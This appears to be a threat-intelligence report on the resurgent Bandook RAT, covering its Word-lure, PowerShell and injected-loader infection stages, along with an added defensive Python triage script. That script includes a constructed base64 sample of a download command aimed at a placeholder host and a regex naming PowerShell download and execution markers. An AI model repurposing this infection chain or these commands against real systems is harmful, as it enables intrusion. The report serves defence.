Like a phoenix rising from the ashes, Bandook has returned after several years. Bandook, written in both Delphi and C++, was first seen in 2007 as a commercially available RAT, developed by a Lebanese individual known as PrinceAli.
Over the years, variants of Bandook were leaked on the Web, and the malware became available for public download.
Bandook was last featured in the Operation Manul campaign in 2015 and in Dark Caracal in 2017. During the past year, dozens of digitally signed variants of the once-famous Bandook began to reappear in the threat landscape.
Government, financial, energy, food industry, healthcare, education, IT and legal institutions are the targeted sectors.
Singapore, Cyprus, Chile, Italy, the USA, Turkey, Switzerland, Indonesia and Germany: not a list of tourist destinations, but the targeted countries.
Given the wide array of sectors and countries targeted, it is suspected that the malware is not developed by a single entity for its own use but by an offensive infrastructure that sells it to governments and threat actors worldwide.
Stages of Infection
The infection chain can be described in three stages, as shown in the picture below:
Stage 1 – Lure Documents
The targeted Microsoft Word document consists of encrypted malicious script data and an external template that points to a document containing malicious VBA macros.
This external template is downloaded via a URL-shortening web service that redirects to another domain controlled by the attacker. The VBA code then runs automatically, decrypts the data embedded in the original lure document, and drops the decoded data into two files in the local user folder: fmx.ps1 and sdmc.jpg.
Sample document file names:
- Malaysia Shipment.docx
- Jakarta Shipment.docx
- malta containers.docx
- Certified documents.docx
- Notarized Documents.docx
- bank statement.docx
- passport and documents.docx
- Case Draft.docx
- documents scan.docx
Stage 2 – PowerShell Loader
After the first stage, fmx.ps1 is executed. It is a short PowerShell script that decodes and executes a base64-encoded PowerShell script stored in sdmc.jpg.
The decoded PowerShell script then downloads a zip file containing four files from a cloud service such as Dropbox, Bitbucket or an S3 bucket. The zip file is stored in the user’s Public folder, and the four files are extracted there.
Three of the files, a.png, b.png and untitled.png, generate the malware payload. untitled.png is actually a valid image which contains a hidden RC4 function encoded in the RGB values of its pixels, created using the known tool Invoke-PSImage.
Finally, the PowerShell script executes the malware, opens draft.docx, and deletes all previous artifacts from the Public folder.
draft.docx is a benign document that convinces the victim that the document is no longer available and that the overall execution was successful.
The document as seen post infection:
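As an added defender's example (not code from the original write-up), the following Python triages the stage 1 to stage 2 hand-off described above: it checks whether a file named like an image is a real JPEG or a base64 wrapper around PowerShell (the role sdmc.jpg plays), and flags a Word process launching PowerShell on a script in the user folder. All inputs are constructed, and the process-event field names are an assumption rather than any particular product's schema.

```python
import base64
import re
from typing import Optional

# Constructed inputs for this example: a fake "sdmc.jpg" wrapping an invented
# download-and-extract one-liner in base64, a real JPEG header, and two process events.
FAKE_SDMC_JPG = base64.b64encode(
    b"Invoke-WebRequest 'https://cloud.example/a.zip' -OutFile $env:PUBLIC\\a.zip")
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + bytes(40)
EVENTS = [  # Sysmon-like shape; the field names are an assumption
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": r"powershell -ep bypass -f C:\Users\bob\fmx.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell Get-Date"},
]
PS_MARKERS = re.compile(
    rb"Invoke-WebRequest|Invoke-Expression|\bIEX\b|DownloadString|Expand-Archive|\$env:", re.I)

def looks_like_jpeg(data: bytes) -> bool:
    """A genuine JPEG begins with the SOI marker FF D8 FF."""
    return data[:3] == b"\xff\xd8\xff"

def hidden_powershell(data: bytes) -> Optional[str]:
    """Return the decoded text if data is a base64 blob that decodes to PowerShell-looking code."""
    blob = data.strip()
    if not blob or not re.fullmatch(rb"[A-Za-z0-9+/=\r\n]+", blob):
        return None
    try:
        decoded = base64.b64decode(blob)
    except ValueError:
        return None
    # Check the raw bytes and a UTF-16LE view (the encoding powershell -EncodedCommand expects).
    for cand in (decoded, decoded.decode("utf-16-le", "ignore").encode("ascii", "ignore")):
        if PS_MARKERS.search(cand):
            return cand.decode("ascii", "ignore")
    return None

def triage_image_file(name: str, data: bytes) -> dict:
    """Flag an image-named file that is not an image but carries a base64 PowerShell stage."""
    verdict = {"file": name, "valid_jpeg": looks_like_jpeg(data), "hidden_powershell": False}
    if not verdict["valid_jpeg"] and hidden_powershell(data) is not None:
        verdict["hidden_powershell"] = True
    return verdict

def word_spawned_user_script(ev: dict) -> bool:
    """Office parent launching PowerShell on a .ps1 under the user profile (stage 1 -> stage 2)."""
    return (ev["parent"].lower() in {"winword.exe", "excel.exe"}
            and ev["image"].lower() == "powershell.exe"
            and re.search(r"(?i)\\users\\[^\\]+\\\S*\.ps1", ev["cmdline"]) is not None)
```

Both checks are cheap enough to run over every dropped file and every Office-spawned process event, which is where this chain is easiest to stop.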
Stage 3 – Bandook Loader
The final payload is a variant of Bandook that starts with a loader which creates a new instance of an Internet Explorer process and injects a malicious payload into it. The payload contacts the C&C server, sends basic information about the infected machine, and waits for additional commands from the server. Valid Certum certificates were also found to have been used to sign the Bandook malware executable.
There are three variants that are currently available:
- A full-fledged version with 120 commands (not signed)
- A full-fledged version (single sample) with 120 commands (signed)
- A slimmed-down version with 11 commands (signed)
This indicates the operators’ desire to reduce the malware’s footprint and minimize the chances of detection in campaigns against high-profile targets, whereas the unsigned 120-command version can be used against low-profile targets.
All evidence supports our belief that the mysterious operators behind the malicious infrastructure of “Operation Manul” and “Dark Caracal” are still alive and operational, willing to assist anyone who is willing to pay with offensive cyber operations. It is best to take the necessary steps to block the infection at its very first stages.